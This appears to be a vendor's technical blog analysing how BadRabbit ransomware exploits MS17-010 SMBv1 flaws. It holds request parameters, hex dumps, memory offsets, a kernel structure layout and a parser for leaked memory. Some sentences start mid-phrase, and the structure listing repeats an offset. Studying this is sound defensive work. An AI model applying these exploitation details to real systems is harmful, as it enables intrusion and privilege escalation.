Overview
On October 23, 2017, CrowdStrike® became aware of a new type of ransomware called BadRabbit. The initial infection occurred via a drive-by download masquerading as an Adobe Flash update. Once downloaded, the malware required user interaction in order to execute. After that occurred, BadRabbit could self-propagate across a network by using stolen credentials (obtained via a Mimikatz-based tool, by reusing an authenticated session, or by brute-forcing account credentials) to exploit multiple vulnerabilities in Server Message Block (SMB) version 1. The CrowdStrike Falcon® endpoint protection (EPP) platform provides defense against this variant of ransomware. For Falcon customers, this can be enabled by turning on the prevention features within the product.

This blog provides a technical analysis of the exploits used by BadRabbit. The sample hashes that were analyzed:
- Dropper: 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
- infpub.dat: 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

Upon detonation of the malware, the CrowdStrike Security Response Team (SRT) noticed two things: first, attempts to leverage credentials dumped via Mimikatz, and second, odd SMB network activity that resembled the exploitation of one of the SMBv1 vulnerabilities in MS17-010. The team immediately dug into the code to determine where the network traffic came from, and found the exploit code located directly after one of the brute-force routines. From there, we were able to work out the specific vulnerabilities being exploited and how BadRabbit leverages them to spread across a network.

MS17-010 is the Microsoft Security Bulletin released on March 14, 2017 that covers the vulnerabilities behind the multiple exploits discovered in the Shadow Brokers' dump. In that dump there was a tool called Fuzzbunch that contained several binaries (EternalRomance, EternalBlue, etc.). Each of these binaries exploits one or more of the vulnerabilities identified in the security bulletin. On October 26, 2017, Talos posted an update to its blog indicating that a similar MS17-010 vulnerability was used by EternalRomance to exploit hosts. The blog includes a link to an exploit built by Worawit Wang (_sleepya on Twitter) that uses two vulnerabilities in MS17-010 to exploit a system via privilege escalation. Although our analysis was complete, we went back and corrected a few incorrect assumptions related to kernel structure offsets using Worawit's code. (The link is in the Resources section at the end of the blog.) The analysis below explains how this exploit works and provides concrete values based on our detonation in a Windows 7 SP1 x86 environment.
Technical Analysis
BadRabbit exploits two of the vulnerabilities covered in the MS17-010 security bulletin:
- CVE-2017-0146
  - A race condition using SMB_COM_NT_TRANSACT requests to leak kernel memory
- CVE-2017-0143
  - Allows an out-of-bounds (OOB) write to modify a memory-adjacent data structure

Functions referenced in this analysis (addresses in the analyzed sample):
- 0x10001CA3 - SMB session setup function
- 0x10002191 - Named pipe connection function
- 0x100046C7 - Exploit MS17-010 function
- 0x100021DC - Close and disconnect post-exploitation function
- 0x10001EB9 - Connect ADMIN$ share
- 0x10002054 - Check for cscc.dat
- 0x10004AB5 - Write BadRabbit malware (infpub.dat)
- 0x1000516B - RPC svcctl service setup function
Establishing the SMB Connection
An initial SMB connection attempt is made using the hardcoded username/password combinations within the BadRabbit binary. Any successful SMB authentication will launch into the MS17-010 privilege escalation exploit.

Observed packet sequence:
  SMB Negotiate Protocol Request
  SMB Negotiate Protocol Response
  SMB Session Setup Request, NTLMSSP_NEGOTIATE
  SMB Session Setup Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
  SMB Session Setup Request, NTLMSSP_AUTH, User: \Administrator
  SMB Session Setup Response
  SMB Tree Connect AndX Request, Path: \\172.16.1.133\IPC$
  SMB Tree Connect AndX Response
  SMB Nt Create AndX Request, FID: 0x4000, Path: atsvc
  SMB Nt Create AndX Response, FID: 0x4000
Test for Vulnerable Condition
Similar to NotPetya, WannaCry, and Fuzzbunch, BadRabbit tests whether the target machine is vulnerable to MS17-010. The test itself, however, differs from its counterparts in previous attacks. Rather than provoking an invalid response from the server, BadRabbit leaks kernel memory and then verifies the leaked data.

SMBv1 contains a race condition that is triggered by sending an SMB_COM_NT_TRANSACT request followed immediately by an SMB_COM_NT_TRANSACT_SECONDARY request. The leak occurs when the MaxBufferSize (set during session setup) is smaller than the size of the response from the target. In this example, MaxBufferSize is set to 4356, and the size of the response is established by setting MaxParameterCount to 16188. The SMB_COM_NT_TRANSACT_SECONDARY request specifies the number of bytes to leak by setting DataCount to 276.
SMB Header
  Tree ID: 2048
  Process ID: 65279
  User ID: 2048
  Multiplex ID: 5812
NT Trans Request (0xA0)
  Total Parameter Count: 4
  Total Data Count: 4356
  Max Parameter Count: 16188
  Max Data Count: 4304
  Parameter Count: 4
  Parameter Offset: 76
  Data Count: 4304
  Data Offset: 80
  Setup Count: 0
  Function: NT RENAME (5)
  Byte Count: 4311
  Padding: 000000
  NT Rename Data: (4311 random junk bytes)
SMB Header
  Tree ID: 2048
  Process ID: 65279
  User ID: 2048
  Multiplex ID: 5812
NT Trans Secondary Request (0xA1)
  Total Data Count: 276
  Parameter Count: 0
  Parameter Offset: 0
  Parameter Displacement: 0
  Data Count: 276 (number of bytes to leak)
  Data Offset: 72
  Byte Count: 1
0000h: 00 56 AD 04 D7 0B DB D4 9E 4D 8C 9C EF 9F 04 29  .V.×.ÛÔžMŒœïŸ.)
0010h: B4 54 1D 74 4B 5D D3 1C 2F FF FF FF 00 C8 50 00  ´T.tK]Ó./ÿÿÿ.ÈP.
0020h: 00 00 08 01 06 46 72 61 67 01 08 E6 01 46 72 65  .....Frag..æ.Fre
0030h: 65 68 15 93 84 68 15 93 84 FF FF FF 00 FF FF FF  eh.“„h.“„ÿÿÿ.ÿÿÿ
0040h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0050h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0060h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0070h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0080h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0090h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00A0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00B0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00C0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00D0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00E0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00F0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0100h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0110h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF  .ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0120h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00           .ÿÿÿ.ÿÿÿ.ÿÿÿ.
Leaking a Transaction Data Structure
Once it is confirmed that the system is vulnerable to MS17-010, a useful information leak can be manufactured that contains the data needed to carry out a privilege escalation exploit. An SMB_COM_TRANSACTION data structure is leaked from kernel memory using the same bug.
Packet Sandwich
In order to leak something useful for manipulating memory, a large packet containing 17 requests is sent from the attacker to the target. Each request carries a different Multiplex ID (MID). A MID is a unique identifier for a single transaction. For the purposes of this analysis, the Multiplex IDs generated during our test run are used consistently throughout; note that the MIDs will differ between tests.
- SMB_COM_NT_TRANSACT
- SMB_COM_NT_TRANSACT_SECONDARY
  - Combined with the NT Rename transaction, this creates the information leak
- SMB_COM_NT_TRANSACT
  - Multiplex ID is the same as the File ID (FID)
  - This transaction is used to write to the adjacent data structure
- SMB_COM_TRANSACTION
  - MID 5377; this transaction is corrupted at a later point via the same bug that is used by EternalRomance
- SMB_COM_TRANSACTION
  - MID 5378, padding
- SMB_COM_TRANSACTION
  - MID 5379; this is the data structure that is leaked
- 9 SMB_COM_TRANSACTIONs
  - MID 5380-5388
0000h: 00 6D 30 4F E9 A7 76 DE 5B 3B 45 13 15 3B F6 34  .m0Oé§vÞ[;E..;ö4
0010h: 5A B8 E3 80 7B 87 1F 13 35 00 00 00 00 20 50 00  Z¸ã€{‡..5.... P.
0020h: 00 00 02 01 06 46 72 61 67 01 02 FB 07 4C 53 74  .....Frag..û.LSt
0030h: 72 C8 0F 00 00 00 00 00 00 0C 02 C8 0F 00 00 00  rÈ.........È....
0040h: 00 58 30 CD 85 F0 79 25 86 58 FA 4C 86 D8 3D 4D  .X0Í…ðy%†XúL†Ø=M
0050h: 86 50 60 51 86 28 10 22 A6 00 00 00 00 00 00 02  †P`Q†(."¦.......
0060h: 00 D8 00 51 86 CD A6 00 00 FF FF FF FF 00 00 00  .Ø.Q†Í¦..ÿÿÿÿ...
0070h: 00 DC 00 51 86 00 00 00 00 DC 00 51 86 00 10 51  .Ü.Q†....Ü.Q†..Q
0080h: 86 DC 02 51 86 00 10 51 86 00 00 00 00 00 00 00  †Ü.Q†..Q†.......
0090h: 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00  ................
00A0h: 00 24 0D 00 00 00 00 00 00 00 00 00 00 01 01 00  .$..............
00B0h: 00 00 00 00 08 FF FE 00 08 03 15 00 00 00 00 00  .....ÿþ.........
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01  ................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00  ..............@.
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00F0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0100h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0110h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0120h: 00 00 00 00 00 00 00 00 00 00 00 00 00           .............
"Frag," and instead of "Free," "LStr." Now the leaked data can be mined for useful information.
Leaked Transaction
The hex dump below contains the leaked SMB_COM_TRANSACTION from above with the extraneous data trimmed. The bytes “00 08 FF FE 00 08” at offset 0x7A are the Tree ID, Process ID and User ID for the SMB connection. The Tree ID is a unique identifier that represents an open connection to a share. The Process ID is assigned on the client end of the SMB connection and identifies the process on the client that initiated the request. The User ID represents the authenticated connection to the share.
0000h: 0C 02 C8 0F 00 00 00 00 58 30 CD 85 F0 79 25 86  ..È.....X0Í…ðy%†
0010h: 58 FA 4C 86 D8 3D 4D 86 50 60 51 86 28 10 22 A6  XúL†Ø=M†P`Q†(."¦
0020h: 00 00 00 00 00 00 02 00 D8 00 51 86 CD A6 00 00  ........Ø.Q†Í¦..
0030h: FF FF FF FF 00 00 00 00 DC 00 51 86 00 00 00 00  ÿÿÿÿ....Ü.Q†....
0040h: DC 00 51 86 00 10 51 86 DC 02 51 86 00 10 51 86  Ü.Q†..Q†Ü.Q†..Q†
0050h: 00 00 00 00 00 00 00 00 04 00 00 00 00 02 00 00  ................
0060h: 00 00 00 00 00 00 00 00 24 0D 00 00 00 00 00 00  ........$.......
0070h: 00 00 00 00 01 01 00 00 00 00 00 08 FF FE 00 08  ............ÿþ..
0080h: 03 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0090h: 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00  ................
00A0h: 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00  .....@..........
00B0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00F0h: 00 00 00 00                                      ....
Looking back at the “Packet Sandwich” section, MID 5379 is one of the multiple requests inside that packet.
Useful Memory Addresses
A lot of useful data is pulled from the information leak:
- 0x0C - Connection structure address
  - 0x862579F0
- 0x10 - Session structure address
  - 0x864CFA58
- 0x14 - TreeConnect address
  - 0x864D3DD8
- 0x18 - _FLINK address
  - 0x86516050
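The values in this list can be checked against the trimmed leak by decoding it with the member offsets of the transaction layout given in the Reference section at the end of this post (Windows 7 SP1 x86). The following parser is an added example written for this post, not code from CrowdStrike or from Worawit's repository. Its input is the first 0x84 bytes of the trimmed leak of MID 5379 shown in the Leaked Transaction section; `LIST_ENTRY_OFFSET`, `KERNEL_BASE_X86`, `looks_like_transaction` and `describe` are this example's own names. The address of the next transaction in the list is derived as _FLINK minus the 0x18 offset of the list entry inside the structure, which is how the value 0x86516038 quoted later in the post is obtained, and the plausibility check assumes the default 2 GB/2 GB address split, under which kernel pointers lie at or above 0x80000000.

```python
"""Decode the leaked SMB_COM_TRANSACTION image and recover the addresses listed above.

Member offsets follow the transaction layout in the Reference section of the post
(Windows 7 SP1 x86). LEAKED_TRANSACTION is copied from the trimmed leak dump.
"""
import struct

# First 0x84 bytes of the trimmed leak of MID 5379 (copied from the dump above).
LEAKED_TRANSACTION = bytes.fromhex(
    "0C02C80F00000000" "5830CD85F0792586"
    "58FA4C86D83D4D86" "50605186281022A6"
    "0000000000000200" "D8005186CDA60000"
    "FFFFFFFF00000000" "DC00518600000000"
    "DC00518600105186" "DC02518600105186"
    "0000000000000000" "0400000000020000"
    "0000000000000000" "240D000000000000"
    "0000000001010000" "00000008FFFE0008"
    "03150000"
)

LIST_ENTRY_OFFSET = 0x18          # _FLINK lives at +0x18 of the transaction (Reference section)
POINTER_FIELDS = {                # LPVOID members and their offsets from the Reference section
    "connection": 0x0C, "session": 0x10, "tree_connect": 0x14, "flink": 0x18,
    "in_parameters": 0x40, "out_parameters": 0x44, "in_data": 0x48, "out_data": 0x4C,
}
ID_FIELDS = {"tid": 0x7A, "pid": 0x7C, "uid": 0x7E, "mid": 0x80}   # WORD members
KERNEL_BASE_X86 = 0x80000000      # assumption: default 2 GB/2 GB split, no /3GB


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def parse_transaction(buf):
    """Decode the members this analysis relies on from a raw transaction image."""
    if len(buf) < 0x82:
        raise ValueError("need at least 0x82 bytes to reach MultiplexID")
    t = {name: u32(buf, off) for name, off in POINTER_FIELDS.items()}
    t.update({name: u16(buf, off) for name, off in ID_FIELDS.items()})
    t["timeout"] = u32(buf, 0x30)
    t["total_data_count"] = u32(buf, 0x68)
    # CONTAINING_RECORD-style step: the list entry sits at +0x18, so the base of
    # the next transaction in the list is its _FLINK value minus that offset.
    t["next_transaction"] = t["flink"] - LIST_ENTRY_OFFSET
    return t


def looks_like_transaction(t, expected_tid, expected_uid):
    """Plausibility check for a leaked image: every pointer member must lie in
    kernel space and the TID/UID must match the session that sent the request."""
    pointers_ok = all(t[name] >= KERNEL_BASE_X86 for name in POINTER_FIELDS)
    return pointers_ok and t["tid"] == expected_tid and t["uid"] == expected_uid


def describe(t):
    """Render the recovered values the way the list above presents them."""
    return [
        "0x0C - Connection structure address - 0x%08X" % t["connection"],
        "0x10 - Session structure address - 0x%08X" % t["session"],
        "0x14 - TreeConnect address - 0x%08X" % t["tree_connect"],
        "0x18 - _FLINK address - 0x%08X" % t["flink"],
        "next transaction (_FLINK - 0x18) - 0x%08X" % t["next_transaction"],
        "TID %d, PID %d, UID %d, MID %d" % (t["tid"], t["pid"], t["uid"], t["mid"]),
    ]


if __name__ == "__main__":
    tx = parse_transaction(LEAKED_TRANSACTION)
    print("\n".join(describe(tx)))
    print("plausible:", looks_like_transaction(tx, expected_tid=2048, expected_uid=2048))
```

Running it reproduces the four addresses above and the identifiers in the header (TID 2048, PID 65279, UID 2048, MID 5379); the plausibility check is the kind of sanity test an analyst applies before trusting that a leak actually hit a live transaction rather than unrelated pool memory.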
Taking Control of a Transaction
Now BadRabbit needs to take control of a transaction data structure. To do this, it exploits one of the vulnerabilities used by EternalRomance.

Figure 7: Exploiting the Out-of-Bounds Write

The graphic above is a layout of how EternalRomance exploits the vulnerability. BadRabbit does not use a TRANS_READ_NMPIPE request as the initial request, but rather the SMB_COM_NT_TRANSACT request previously seen in the Packet Sandwich section. The MID of this request is set to the same File ID that was assigned earlier by the Nt Create AndX Request in the initialization section. An initial SMB_COM_WRITE_ANDX request is set to raw mode, the MID = 0x4000 (same as the File ID), and the DataLength is set to 512 bytes.

SMB Header
  Tree ID: 2048
  Process ID: 65279
  User ID: 2048
  Multiplex ID: 16384
NT Trans Secondary Request (0xA1)
  Total Data Count: 1
  Parameter Count: 0
  Parameter Offset: 0
  Parameter Displacement: 0
  Data Count: 1
  Data Offset: 72
  Data Displacement: 15880
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C  ..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE  ..............ÿþ
0020h: 00 08 00 40 00 20 12 00 00 00 00 00 00 00 01 00  ...@. ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00  .......0........
0040h: 01 00 00 00 48 00 00 00 00 40 08 3E 00 00 00 02  ....H....@.>....
0050h: 00 00 00                                         ...
Modifying the Multiplex ID of MID 5377
BadRabbit uses this exploit to change the Multiplex ID of the adjacent transaction data structure. This is similar to EternalRomance, but whereas EternalRomance changes the MID to 0, BadRabbit overwrites only the least significant byte of the Multiplex ID with 0x00. The hex representation of 5377 is “0x1503.” The “03” byte is what is overwritten with 0x00, changing the MID to 5376.

Figure 9: Overwrites MID of Adjacent Transaction

Once complete, BadRabbit confirms this by sending an NT Trans Rename request to the target with the MID set to 5376. Due to the modification, the server responds with a non-specific error code: the Server Class field is set to 0x012 and the Error Code is set to 0x0001.
  SMB NT Trans Request, NT RENAME
  SMB NT Trans Response, NT RENAME, Error: Non specific error code
The Writer Object
More than just the MID of the adjacent transaction can be modified using the method described above. For example, if the pointer to the buffer that receives data (the InData pointer) is modified, any subsequent transaction request that sends data and uses MID 5376 will overwrite whatever the pointer at that offset within the transaction data structure points to. BadRabbit uses this to modify the MID 5379 data structure that was leaked in a previous section.

Changing the InData Ptr in MID 5376 to Point to MID 5379 and Overwrite
Another SMB_COM_TRANSACTION_SECONDARY request, with the MID set to the File ID (FID), is used to modify a pointer in the memory adjacent to the MID 5376 data structure. To do this, the DataDisplacement value is set to 15,824, and the base memory address of the MID 5379 data structure is written at that offset.

Figure 11: Point MID 5376 InData Pointer to MID 5379

Calculating the base address of the MID 5379 transaction data structure requires revisiting the information leak that contained that data structure. A variety of pointers are located throughout the data structure. The InDataParameters buffer pointer, located at offset 0x40 in the leaked transaction, can be used to calculate the base address of the MID 5379 transaction.
0000h: 0C 02 C8 0F 00 00 00 00 58 30 CD 85 F0 79 25 86  ..È.....X0Í…ðy%†
0010h: 58 FA 4C 86 D8 3D 4D 86 50 60 51 86 28 10 22 A6  XúL†Ø=M†P`Q†(."¦
0020h: 00 00 00 00 00 00 02 00 D8 00 51 86 CD A6 00 00  ........Ø.Q†Í¦..
0030h: FF FF FF FF 00 00 00 00 DC 00 51 86 00 00 00 00  ÿÿÿÿ....Ü.Q†....
0040h: DC 00 51 86 00 10 51 86 DC 02 51 86 00 10 51 86  Ü.Q†..Q†Ü.Q†..Q†
0050h: 00 00 00 00 00 00 00 00 04 00 00 00 00 02 00 00  ................
0060h: 00 00 00 00 00 00 00 00 24 0D 00 00 00 00 00 00  ........$.......
0070h: 00 00 00 00 01 01 00 00 00 00 00 08 FF FE 00 08  ............ÿþ..
0080h: 03 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0090h: 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00  ................
00A0h: 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00  .....@..........
00B0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00F0h: 00 00 00 00                                      ....
the way the MID 5377 was modified. After the analysis we came across code written by _sleepya (Worawit) that contains the offsets for the data structure (listed and linked in the references). Using the identified offsets, it breaks down as follows:
- +0x40 - 0x86510038
  - InDataParameters buffer pointer
  - Set to the memory location of MID 5379
  - This gives MID 5379 the ability to modify itself using an SMB request that contains parameters
- +0x44 - 0x86510238
  - OutParameters buffer pointer
  - MID 5379 + 0x200
- +0x48 - 0x86516038
  - InData buffer pointer
  - Address of the next transaction in the list
  - Calculated from the _FLINK pointer (offset 0x18 in the MID 5379 info leak)
  - Address of a linked transaction
  - Used in the next section
Controlling Multiplex ID 5851
The original MID for this transaction is unknown, but it is going to be changed to 5851. This will allow the attacker to use it by referencing MID 5851 in future transaction requests. To accomplish this, an SMB_COM_TRANSACTION_SECONDARY request is made using MID 5379.

SMB Header
  Tree ID: 2048
  Process ID: 65279
  User ID: 2048
  Multiplex ID: 5379
NT Trans Secondary Request (0xA1)
  Total Data Count: 2
  Parameter Count: 0
  Parameter Offset: 0
  Parameter Displacement: 0
  Data Count: 2
  Data Offset: 72
  Data Displacement: 128
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C  ..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE  ..............ÿþ
0020h: 00 08 03 15 00 20 12 00 00 00 00 00 00 00 02 00  ..... ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00  .......0........
0040h: 02 00 00 00 48 00 00 00 00 40 80 00 00 00 00 03  ....H....@€.....
0050h: 00 00 DB 16                                      ..Û.
Conclusion
As demonstrated, BadRabbit exploits two of the vulnerabilities identified in MS17-010 to leak information and take control of multiple data structures. The second part of this blog post will cover how the controlled transactions are leveraged to elevate privileges to System.

Reference
Transaction Data Structure
Part of the following is created from the code on _sleepya's (Worawit) github, and the rest is derived from analyzing the SrvSmbTransaction function in the SMB driver (srv.sys). This is based on Windows 7 SP1 x86.
typedef struct _SMB_COM_TRANSACTION {
    /* 0x08 */ LPVOID PagePool;
    /* 0x0C */ LPVOID ConnectionStruct;
    /* 0x10 */ LPVOID SessionStruct;
    /* 0x14 */ LPVOID TreeConnectStruct;
    /* 0x18 */ LPVOID _FLINK;
    /* 0x30 */ DWORD  Timeout;
    /* 0x40 */ LPVOID InParameter;
    /* 0x44 */ LPVOID OutParameter;
    /* 0x48 */ LPVOID InData;
    /* 0x4C */ LPVOID OutData;
    /* 0x54 */ DWORD  MaxSetupCount;
    /* 0x58 */        ParameterCount;
    /* 0x5C */        TotalParameterCount;
    /* 0x60 */ DWORD  MaxParameterCount;
    /* 0x68 */        TotalDataCount;
    /* 0x60 */ DWORD  MaxDataCount;
    /* 0x72 */ LPVOID TRANS_FUNCTION;
    /* 0x74 */
    /* 0x78 */ WORD   Flags;
    /* 0x7A */ WORD   TreeID;
    /* 0x7C */ WORD   ProcID;
    /* 0x7E */ WORD   UserID;
    /* 0x80 */ WORD   MultiplexID;
} SMB_COM_TRANSACTION;
Resources
Worawit Wang's Exploit Code
We discovered Worawit's (_sleepya on Twitter) github after completing the analysis. It was used to correct incorrect assumptions and fill gaps (referenced throughout this article). This exploit code was used to model the exploit used by BadRabbit. Check out the rest of Worawit Wang's github; it contains a significant amount of analysis on MS17-010 done by Worawit.